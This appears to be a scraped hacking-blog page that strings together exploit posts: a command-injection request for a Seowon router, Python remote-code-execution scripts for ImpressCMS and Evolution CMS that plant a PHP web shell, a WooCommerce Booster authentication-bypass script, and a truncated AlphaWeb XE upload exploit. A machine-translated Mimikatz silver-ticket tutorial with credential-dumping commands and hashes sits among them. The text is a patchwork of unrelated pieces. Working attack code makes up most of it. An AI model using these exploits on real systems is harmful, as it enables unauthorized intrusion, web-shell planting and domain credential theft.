# Exploit Title: Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)
# Date: 2021-09-15
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://www.seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29
# Version: All Version
# Tested on: Windows 10 Enterprise x64 , Linux
# [ About - Seowon 130-SLC router ] :
#The SLC-130 series are all-in-one LTE CPE that delights you in handling multi-purpose environments that require data and WiFi,
#Its sophisticated and stable operation helps you excel yourself at office and home,
#Improve communication with excellence and ease your life.
# [ Description ]:
#Execute commands without authentication as admin user ,
#To use it in all versions, we only enter the router ip & Port(if available) in the request
#The result of the request is visible on the browser page
# [ Sample RCE Request ] :
POST / HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.1:443/diagnostic.html?t=201701020919
Content-Length: 183
Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte;
cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0;
cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0;
cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
Connection: keep-alive
Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;ls&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863133950
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 15-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.impresscms.org/
# Software Link: https://www.impresscms.org/modules/downloads/
# Version: 1.4.2
# Category: Webapps
# Tested on: Linux/Windows
# ImpressCMS is a multilingual content management system for the web
# Contains an endpoint that allows remote access
# Autotask page misconfigured, causing security vulnerability
# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
import requests
import argparse
import sys
from time import sleep
session = requests.session()
def main():
parser = argparse.ArgumentParser(description='Impresscms Version 1.4.2 - Remote Code Execution (Authenticated)')
parser.add_argument('-u', '--host', type=str, required=True)
parser.add_argument('-l', '--login', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
args = parser.parse_args()
print("\nImpresscms Version 1.4.2 - Remote Code Execution (Authenticated)",
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
exploit(args)
def countdown(time_sec):
while time_sec:
mins, secs = divmod(time_sec, 60)
timeformat = '{:02d}'.format(secs)
print("["+timeformat+"] The task is expected to run!", end='\r')
sleep(1)
time_sec -= 1
def exploit(args):
#Check http or https
if args.host.startswith(('http://', 'https://')):
print("[?] Check Url...\n")
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
sleep(2)
else:
print("\n[?] Check Adress...\n")
args.host = "http://" + args.host
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
sleep(2)
try:
response = requests.get(args.host)
if response.status_code != 200:
print("[-] Address not reachable!")
sleep(2)
exit(1)
except requests.ConnectionError as exception:
print("[-] Address not reachable")
exit(1)
response = requests.get(args.host + "/evil.php")
if response.status_code == 200:
print("[*] Exploit file exists!\n")
sleep(2)
print("[+] Exploit Done!\n")
while True:
cmd = input("$ ")
url = args.host + "/evil.php?cmd=" + cmd
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
}
response = requests.post(url, headers=headers, timeout=5)
if response.text == "":
print(cmd + ": command not found\n")
else:
print(response.text)
else:
#Login and set cookie
url = args.host + "/user.php"
cookies = {
"ICMSSESSION": "gjj2svl7qjqorj5rs87b6thmi5"
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host,
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = {
"uname": args.login,
"pass": args.password,
"xoops_redirect": "/",
"op": "login"
}
response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
new_cookies = session.cookies.get("ICMSSESSION")
if (new_cookies is None):
print("[-] Login Failed...\n")
print("Your username or password is incorrect.")
sleep(2)
exit(1)
else:
print("[+] Success Login...\n")
sleep(2)
# Create Tasks
url = args.host + "/modules/system/admin.php?fct=autotasks&op=mod"
cookies = {
"ICMSSESSION": new_cookies
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryZ2hA91yNO8FWPZmk",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/modules/system/admin.php?fct=autotasks&op=mod",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = "------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_id\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_lastruntime\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_name\"\r\n\r\nrce\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_code\"\r\n\r\nfile_put_contents('../evil.php', \"<?php system(\\x24_GET['cmd']); ?>\");\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_repeat\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_interval\"\r\n\r\n0001\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_onfinish\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_enabled\"\r\n\r\n1\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_type\"\r\n\r\n:custom\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_addon_id\"\r\n\r\n\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"icms_page_before_form\"\r\n\r\n"+args.host+"/modules/system/admin.php?fct=autotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"op\"\r\n\r\naddautotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"modify_button\"\r\n\r\nSubmit\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk--\r\n"
response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
if response.headers.get("location") == args.host + "/modules/system/admin.php?fct=autotasks":
print("[*] Task Create.\n")
sleep(2)
countdown(60)
print("\n\n[+] Exploit Done!\n")
sleep(2)
while True:
cmd = input("$ ")
url = args.host + "/evil.php?cmd=" + cmd
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
}
response = requests.post(url, headers=headers, timeout=5)
if response.text == "":
print(cmd + ": command not found\n")
else:
print(response.text)
elif response.headers.get("location") == args.host + "/user.php":
print("[!] Unauthorized user!\n\n")
print("Requires user with create task permissions.")
sleep(2)
else:
pass
if __name__ == '__main__':
main()
0x01シルバーチケット定義
シルバーチケットは、Kerberosチケット助成サービス(TGS)を偽造したチケットであり、サービスチケットとも呼ばれます。下の図に示すように、AS-REQとAS-REP(ステップ1および2)はなく、ドメインコントローラーとのTGS-REQ/TGS-REP(ステップ3および4)通信はありません。請求書は偽造されたTGSであるため、ドメインコントローラーと通信しません。
0x02シルバーノートの機能
1。シルバーノートは有効なノートグラントサービス(TGS)Kerberosノートです。これは、Kerberos検証サービスが実行する各サーバーがサービスを暗号化および署名しているためです。
2。ゴールドノートはTGTを偽造され、Kerberosサービスのために効果的に取得され、シルバーノートはTGSを偽造しています。これは、シルバーノートが特定のサーバー上の任意のサービスに限定されることを意味します。
3.ほとんどのサービスはPACを検証しません(PACチェックサムをPAC検証のためにドメインコントローラーに送信することで)。
4.攻撃者はサービスアカウントのパスワードのハッシュ値を必要とします
5。TGSは偽造されているため、TGTと通信しません。つまり、DCが検証されています。
6.任意のイベントログはターゲットサーバー上にあります。
0x03createシルバーノート
シルバーノートを作成または鍛造するには、攻撃者はターゲットサービスアカウントのパスワードハッシュ値を取得する必要があります。ターゲットサービスが使用されているアカウント(MS SQLなど)の下で実行されている場合、サービスアカウントのパスワードハッシュは、紙幣を作成するために必要です。 kerberoast(https://github.com/nidem/kerberoast)を使用した亀裂サービスアカウントのパスワードは、ターゲットサービスに関連するパスワードデータを識別するための効果的な防止です。コンピューターホスティングサービスも最も一般的なサービスであり、Windowsファイル共有を利用する「CIFS」サービスです。コンピューター自体がこのサービスをホストするため、シルバーノートの作成に必要なパスワードデータは、関連するコンピューターアカウントのパスワードハッシュ値です。コンピューターがActive Directoryに結合されると、新しいコンピューターアカウントオブジェクトが作成され、コンピューターに追加されます。パスワードと関連するハッシュハッシュは、アカウントを所有するコンピューターに保存され、NTLMパスワードハッシュはドメインのドメインコントローラーのActive Directoryデータベースに保存されます。攻撃者がコンピューターで管理権を取得したり、ローカルシステムとしてコードを実行できる場合、攻撃者はMimikatzを使用して広告コンピューターアカウントのパスワードをシステムからダンプできます(NTLMパスワードハッシュはRC4 Kerberosチケットを暗号化するために使用されます):
Mimikatz "Privilege:3360Debug" "sekurlsa:3360logonpasswords" #requires管理者の許可
0x04 Mimikatz Silver Notes注文
/ドメイン - lab.adsecurity.orgなどの完全なドメイン名
/SID - S-1-5-21-1473643419-774954089-2222329127などのドメインのSID
/ユーザー - ドメインユーザー名
/groups(オプション) - ユーザーが属するグループは
/チケット(オプション) - 後で使用するためにゴールデンチケットファイルを保存するパスと名前を提供するか、 /PTTを使用して金ノートをメモリに挿入してすぐに使用します
/PTT- /チケットの代替品として、それを使用して、使用のために偽のチケットをメモリに即座に挿入します。
/ID(オプション) - ユーザーRID、MIMIKATZデフォルト値は500(デフォルトの管理者アカウントRID)です
/startoffset(optional) - チケットが利用可能なときにオフセットを開始します(通常、このオプションを使用する場合は-10または0に設定)mimikatzデフォルト値は0です
/Endin(オプション) - チケットの有効性時間、Mimikatzデフォルト値は10年、アクティブディレクトリのデフォルトKerberosポリシーは10時間に設定されています
/RENEWMAX(オプション) - 更新の最大妥当性時間を更新する、Mimikatzデフォルト値は10年、アクティブディレクトリのデフォルトKerberosポリシーは最大7日間に設定
1。銀の請求書に必要なパラメーター
/ターゲット - ターゲットサーバーのFQDN
FQDN :(完全資格のあるドメイン名)完全資格のドメイン名:ホスト名とドメイン名の両方を備えた名前。 (シンボル "。")
/サービス - ターゲットサーバーで実行されているKerberosサービス、サービスプリンシパルネームタイプはCIF、HTTP、MSSQLなどです。
/RC4 - サービスのNTLMハッシュ(コンピューターアカウントまたはユーザーアカウント)
2。シルバービルデフォルトグループ
ドメインユーザーSID:S-1-5-21ドメイン-513
ドメイン管理SID:S-1-5-21ドメイン-512
アーキテクチャ管理者SID:S-1-5-21ドメイン-518
エンタープライズ管理者SID:S-1-5-21ドメイン-519
グループポリシー作成所有者SID:S-1-5-21ドメイン-520
3。シルバーノートを作成するミミカッツコマンド
次のMimikatzコマンドは、サーバーADSMSWIN2K8R2.lab.adsecurity.orgでCIFSサービスのシルバーノートを作成します。シルバーチケットを正常に作成するには、ADSMSWIN2K8R2.lab.adsecurity.orgの広告コンピューターアカウントパスワードのハッシュを取得するために、ADドメインダンプまたはローカルシステムでMimikatzを実行する必要があります。 NTLMパスワードハッシュは、RC4パラメーターで使用されます。サービスSPNタイプも /サービスパラメーターで識別する必要があります。ターゲットコンピューターのFQDAは、 /SIDパラメーターの /ターゲットパラメーターとドメインSIDで使用する必要があります。コマンドは次のとおりです。
Mimikatz "Kerberos:3360Golden /user:lukeskywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-777749494089-22229127 /target:Adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt "exit
0x05さまざまなサービスのシルバーノートの実際のリスト
1。シルバーノートのサービスリスト
サービスタイプ
サービスシルバーチケット
WMI
ホスト
RPCSS
Powershell
リモート
ホスト
http
winrm
ホスト
http
スケジュール
タスク
ホスト
Windows
ファイル共有(CIFS)
CIF
ldap
を含む操作
ミミカッツdcsync
ldap
Windows
リモートサーバー管理ツール
RPCSS
ldap
CIF
2。 Windows共有(CIFS)管理アクセスノート
ターゲットコンピューターのWindows共有の管理権を取得するための「CIFS」サービスのシルバーノートを作成します。
CIFSシルバーチケットを注入した後、ターゲットコンピューターの共有にアクセスできるようになりました。
c $共有、共有ファイルにファイルをコピーできます。
3。Windowsコンピューター(ホスト)管理者の権利を備えたシルバーノート
ターゲットコンピューターでカバーされているWindowsサービスの管理者の権利を取得するための銀行メモを作成します。これには、スケジュールされたタスクを変更および作成するための権限が含まれます。
ホストシルバーチケットを使用すると、新しい計画タスクを作成できます。
または、ホストシルバーチケットを活用することにより、既存の計画されたタスクを変更できます。
「HTTP」サービスと「WSMAN」サービスのシルバーチケットを作成して、ターゲットシステムをリモートするWINRMおよびOR PowerShellの管理権限を取得します。
2つのHTTP&WSMANシルバーノートを注入した後、PowerShellを使用してリモート(またはWinRM)を使用してターゲットシステムシェルをバウンスできます。まず、New-PssessionはPowerShellを使用して、リモートシステムへのセッション用のPowerShell CMDLETを作成し、EnterPSSessionがリモートシェルを開きます。
5。シルバーの請求書の証拠は、管理者の権利を備えたWindowsコンピューターのLDAPに接続されています
ターゲットシステムを取得するための「LDAP」サービスのシルバーチケットを作成します(アクティブを含む
ディレクトリ上のLDAPサービスの管理権。
LDAPシルバーチケットを使用すると、LDAPサービスにリモートにアクセスしてKRBTGTに関する情報を取得できます。
注:lsadump:dcsync
同期オブジェクトについてDCに質問を開始します(アカウントのパスワード情報を取得できます)。必要な許可には、管理者、ドメイン管理者、エンタープライズ管理者、およびドメインコントローラーのコンピューターアカウントが含まれます。読み取り専用ドメインコントローラーでは、デフォルトでユーザーパスワードデータを読み取ることができません。
6。シルバーメモの証拠は、管理者の権利を備えたWindowsコンピューターのWMIに接続されています
WMIを使用してターゲットシステムでコマンドをリモートで実行する「ホスト」サービスと「RPCSS」サービスのシルバーノートを作成します。
これらのシルバーノートを注入した後、Kerberos TGSノートが「KLIST」を実行してメモリ内のシルバーノートに注入されていることを確認できます。WMICを呼び出したり、ターゲットシステムでコマンドを実行したりするために「被験者」を介してInvoke-Wmimethodができます。
Invoke -Wmimethod win32_process -computername $ computer
-credential $ creds -name create -argumentlist "$ runcommand"
7。ドメイン制御に「CIFS」サービスリストにアクセス
まず、次の情報を取得する必要があります。
/ドメイン
/sid
/ターゲット:ターゲットサーバーのドメイン名のフルネーム、ドメインコントロールのフルネームは次のとおりです。
/サービス:ターゲットサーバーのKerberosサービス、CIFSは次のとおりです
/RC4:コンピューターアカウントのNTLMハッシュ、ドメイン制御ホストのコンピューターアカウント
/ユーザー:偽造されるユーザー名、ここでは銀をテストできます
ドメインコントロールで次のコマンドを実行して、ドメインコントロールホストのローカル管理者アカウントを取得します。
ミミカッツログ
'sekurlsa:3360logonpasswords'
図:に示すように
注記:
ここでは、コンピューターアカウント、つまりユーザー名: win-8vlrpiajb0 $のntlmハッシュを見つける必要があります。別のアカウントの場合、失敗します。つまり、サービスアカウントを共有する必要があります。
上記の情報は次のとおりです。
/domain:test.local
/SID:S-1-5-21-4155807533-921486164-2767329826
/target:win-8vvlrpiajb0.test.local
/service3360cifs
/RC4:D5304F9EA69523479560CA4EBB5A2155
/user3360Silver
Mimikatzを使用してシルバーチケットをインポートします
ミミカッツ
'kerberos:golden /domain:test.local
/SID:S-1-5-21-4155807533-921486164-2767329826
/target:win-8vvlrpiajb0.test.local /service:cifs
/RC4:D5304F9EA69523479560CA4EBB5A2155 /USER:SILVER /PTT '
図に示すように、この時点でドメインコントロールのファイル共有に正常にアクセスできます。
# Exploit Title: Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)
# Date: 15-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://evo.im/
# Software Link: https://github.com/evolution-cms/evolution/releases
# Version: 3.1.6
# Category: Webapps
# Tested on: Linux/Windows
# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
# python3 exploit.py -h
from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse
import sys
def main():
parser = argparse.ArgumentParser(description='Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)')
parser.add_argument('-u', '--host', type=str, required=True)
parser.add_argument('-l', '--login', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
args = parser.parse_args()
print("\nEvolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)",
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
sleep(2)
exploit(args)
def exploit(args):
#Check http or https
if args.host.startswith(('http://', 'https://')):
print("[?] Check Url...\n")
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
sleep(2)
else:
print("\n[?] Check Adress...\n")
args.host = "http://" + args.host
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
sleep(2)
# Check Host Status
try:
response = requests.get(args.host)
if response.status_code != 200:
print("[-] Address not reachable!")
sleep(2)
exit(1)
except requests.ConnectionError as exception:
print("[-] Address not reachable!")
sleep(2)
exit(1)
# Login and cookie set
session = requests.session()
url = args.host + "/manager/?a=0"
cookies = {
"mybb[lastvisit]": "1631537273",
"loginattempts": "1",
"mybb[lastactive]": "1631537588",
"mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
"evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
"KCFINDER_showname": "on",
"KCFINDER_showsize": "off",
"KCFINDER_showtime": "off",
"KCFINDER_order": "name",
"KCFINDER_orderDesc": "off",
"KCFINDER_view": "thumbs",
"KCFINDER_displaySettings": "off",
"evoq28fzr": "o0hd9im6q76pptjcsjeaa693os"
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Content-Type": "application/x-www-form-urlencoded;",
"Accept": "*/*",
"Origin": args.host,
"Referer": args.host + "/manager/",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = {
"ajax": "1",
"username": args.login,
"password": args.password,
"rememberme": "1"
}
response = session.post(url, headers=headers, cookies=cookies, data=data, timeout=5)
new_cookie = response.cookies.get("evoq28fzr")
user_role = response.cookies.get("modx_remember_manager")
if user_role is None:
print("[-] Login Failed!\n")
print("[*]",response.text)
sleep(2)
exit(1)
else:
print("[+] Login Success!\n")
sleep(2)
print("[!] Login User", user_role,"\n")
sleep(2)
# User authorization check
url = args.host + "/manager/index.php"
cookies = {
"mybb[lastvisit]": "1631537273",
"loginattempts": "1",
"mybb[lastactive]": "1631537588",
"mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
"evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
"KCFINDER_showname": "on",
"KCFINDER_showsize": "off",
"KCFINDER_showtime": "off",
"KCFINDER_order": "name",
"KCFINDER_orderDesc": "off",
"KCFINDER_view": "thumbs",
"KCFINDER_displaySettings": "off",
"webfxtab_modulePane": "0",
"evoq28fzr": new_cookie,
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/manager/index.php?a=108&id=1",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = {
"a": "109",
"id": "1",
"mode": "108",
"stay": "2",
"name": "rce",
"description": "<strong>0.1.3</strong> first repository for Evolution CMS ",
"categoryid": "1",
"newcategory": '',
"icon": '',
"resourcefile": '',
"post": "system('whoami');",
"guid": "8d4669cac3afd1f59d416f11eadf3355",
"properties": "{}",
"chkallgroups": "on",
"save": "Submit"
}
response = requests.post(url, headers=headers, cookies=cookies, data=data, timeout=5)
soup = BeautifulSoup(response.text, 'html.parser')
if soup.find_all("title")[0].text == "My Evolution Site (Evolution CMS Manager Login)":
print("[!] Unauthorized user\n\n")
print("User with module creation permissions is required.")
exit(1)
elif soup.find_all("p")[0].text == "You don't have enough privileges for this action!":
print("[!] Unauthorized user\n\n")
print("User with module creation permissions is required.")
exit(1)
else:
print ("[+] Exploit Done!\n")
sleep(2)
pass
while True:
cmd = input("$ ")
# Update Modules
url = args.host + "/manager/index.php"
cookies = {
"mybb[lastvisit]": "1631537273",
"loginattempts": "1",
"mybb[lastactive]": "1631537588",
"mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
"evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
"KCFINDER_showname": "on",
"KCFINDER_showsize": "off",
"KCFINDER_showtime": "off",
"KCFINDER_order": "name",
"KCFINDER_orderDesc": "off",
"KCFINDER_view": "thumbs",
"KCFINDER_displaySettings": "off",
"webfxtab_modulePane": "0",
"evoq28fzr": new_cookie,
}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/manager/index.php?a=108&id=1",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = {
"a": "109",
"id": "1",
"mode": "108",
"stay": "2",
"name": "rce",
"description": "<strong>0.1.3</strong> first repository for Evolution CMS ",
"categoryid": "1",
"newcategory": '',
"icon": '',
"resourcefile": '',
"post": "system('"+cmd+"');",
"guid": "8d4669cac3afd1f59d416f11eadf3355",
"properties": "{}",
"chkallgroups": "on",
"save": "Submit"
}
response = requests.post(url, headers=headers, cookies=cookies, data=data, timeout=5)
# Run Modules
url = args.host + "/manager/index.php?id=1&a=112"
cookies = {
"mybb[lastvisit]": "1631537273",
"loginattempts": "1",
"mybb[lastactive]": "1631537588",
"mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
"evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
"KCFINDER_showname": "on",
"KCFINDER_showsize": "off",
"KCFINDER_showtime": "off",
"KCFINDER_order": "name",
"KCFINDER_orderDesc": "off",
"KCFINDER_view": "thumbs",
"KCFINDER_displaySettings": "off",
"webfxtab_modulePane": "0",
"evoq28fzr": new_cookie,
}
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/manager/index.php?a=108&id=1",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
response = requests.get(url, headers=headers, cookies=cookies, timeout=5)
if response.text == "":
print(cmd + ": command not found\n")
else:
print(response.text)
if __name__ == '__main__':
main()
# Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass
# Date: 2021-09-16
# Exploit Author: Sebastian Kriesten (0xB455)
# Contact: https://twitter.com/0xB455
#
# Affected Plugin: Booster for WooCommerce
# Plugin Slug: woocommerce-jetpack
# Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical=-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/
# Affected Versions: <= 5.4.3
# Fully Patched Version: >= 5.4.4
# CVE: CVE-2021-34646
# CVSS Score: 9.8 (Critical)
# Category: webapps
#
# 1:
# Goto: https://target.com/wp-json/wp/v2/users/
# Pick a user-ID (e.g. 1 - usualy is the admin)
#
# 2:
# Attack with: ./exploit_CVE-2021-34646.py https://target.com/ 1
#
# 3:
# Check-Out out which of the generated links allows you to access the system
#
import requests,sys,hashlib
import argparse
import datetime
import email.utils
import calendar
import base64
B = "\033[94m"
W = "\033[97m"
R = "\033[91m"
RST = "\033[0;0m"
parser = argparse.ArgumentParser()
parser.add_argument("url", help="the base url")
parser.add_argument('id', type=int, help='the user id', default=1)
args = parser.parse_args()
id = str(args.id)
url = args.url
if args.url[-1] != "/": # URL needs trailing /
url = url + "/"
verify_url= url + "?wcj_user_id=" + id
r = requests.get(verify_url)
if r.status_code != 200:
print("status code != 200")
print(r.headers)
sys.exit(-1)
def email_time_to_timestamp(s):
tt = email.utils.parsedate_tz(s)
if tt is None: return None
return calendar.timegm(tt) - tt[9]
date = r.headers["Date"]
unix = email_time_to_timestamp(date)
def printBanner():
print(f"{W}Timestamp: {B}" + date)
print(f"{W}Timestamp (unix): {B}" + str(unix) + f"{W}\n")
print("We need to generate multiple timestamps in order to avoid delay related timing errors")
print("One of the following links will log you in...\n")
printBanner()
for i in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors
hash = hashlib.md5(str(unix-i).encode()).hexdigest()
print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:")
token='{"id":"'+ id +'","code":"'+hash+'"}'
token = base64.b64encode(token.encode()).decode()
token = token.rstrip("=") # remove trailing =
link = url+"my-account/?wcj_verify_email="+token
print(link + f"\n{RST}")
# Exploit Title: AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 09/09/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor website: https://www.zenitel.com/
# Product website: https://wiki.zenitel.com/wiki/AlphaWeb
# Example: python3 CVE-2021-40845.py -u "http://$ip:80/" -c "whoami"
# Reference: https://github.com/ricardojoserf/CVE-2021-40845
import requests
import base64
import argparse
# Default credentials, change them if it is necessary
admin_user = "admin"
admin_pass = "alphaadmin"
scripter_user = "scripter"
scripter_pass = "alphascript"
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
my_args = parser.parse_args()
return my_args
def main():
args = get_args()
base_url = args.url
url_main = base_url + "/php/index.php"
url_upload = base_url + "/php/script_uploads.php"
command = args.command
uploaded_file = "poc.php"
url_cmd = base_url + "/cmd/" + uploaded_file + "?cmd=" + command
login_authorization = "Basic " + str(base64.b64encode((admin_user+':'+admin_pass).encode('ascii')).decode('ascii'))
upload_authorization = "Basic " + str(base64.b64encode((scripter_user+":"+scripter_pass).encode('ascii')).decode('ascii'))
headers_login = {
"Authorization": login_authorization,
"Cache-Control": "max-age=0"
}
headers_upload = {
'Authorization': upload_authorization,
'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="92"',
'sec-ch-ua-mobile': '?0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Sec-Fetch-Site': 'same-origin',
